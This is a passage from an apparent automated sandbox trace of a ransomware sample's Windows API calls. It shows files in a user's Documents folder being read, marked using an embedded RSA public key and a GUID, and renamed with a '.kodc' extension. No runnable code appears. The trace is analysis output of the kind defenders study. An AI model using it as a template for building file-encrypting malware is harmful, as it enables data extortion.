halpmcxz\\documents\\utaoww3nilc4zq3w8.pptx.kodc")) returned 1 [0098.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.793] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.795] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddf56b40, ftCreationTime.dwHighDateTime=0x1d5b6fc, ftLastAccessTime.dwLowDateTime=0x144b2120, ftLastAccessTime.dwHighDateTime=0x1d5b712, ftLastWriteTime.dwLowDateTime=0x144b2120, ftLastWriteTime.dwHighDateTime=0x1d5b712, nFileSizeHigh=0x0, nFileSizeLow=0xc4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UUc ZLKDl.csv", cAlternateFileName="UUCZLK~1.CSV")) returned 1 [0098.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.795] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UUc ZLKDl.csv") returned=".csv" [0098.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UUc ZLKDl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uuc zlkdl.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.795] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=3148) returned 1 [0098.795] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.798] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.798] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.798] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.798] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xc4c, lpOverlapped=0x0) returned 1 [0098.799] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.799] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.799] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.799] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.800] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.800] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.800] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.800] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.800] GetLastError () returned 0x0 [0098.800] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.800] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.800] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.800] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.800] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc50) returned 0x9b91b28 [0098.800] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d648 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d690 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.800] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abc8 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abe0 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331abc8 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abe0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abc8 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.801] GetCurrentThreadId () returned 0x42c [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f7d8 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.802] GetCurrentThreadId () returned 0x42c [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abc8 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abe0 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abf8 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.804] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc4c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.804] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.804] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.804] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.804] CloseHandle (hObject=0x5cc) returned 1 [0098.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.806] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UUc ZLKDl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uuc zlkdl.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\UUc ZLKDl.csv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uuc zlkdl.csv.kodc")) returned 1 [0098.808] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53648da0, ftCreationTime.dwHighDateTime=0x1d571d1, ftLastAccessTime.dwLowDateTime=0x1255b460, ftLastAccessTime.dwHighDateTime=0x1d54e04, ftLastWriteTime.dwLowDateTime=0x1255b460, ftLastWriteTime.dwHighDateTime=0x1d54e04, nFileSizeHigh=0x0, nFileSizeLow=0x94eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WCZ6DRA.xlsx", cAlternateFileName="WCZ6DR~1.XLS")) returned 1 [0098.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.808] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WCZ6DRA.xlsx") returned=".xlsx" [0098.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WCZ6DRA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wcz6dra.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.808] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=38123) returned 1 [0098.808] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.811] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x94c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.811] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.812] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x94eb, lpOverlapped=0x0) returned 1 [0098.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.812] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.813] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.813] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.813] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.813] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.813] GetLastError () returned 0x0 [0098.813] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.813] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.813] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.813] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) 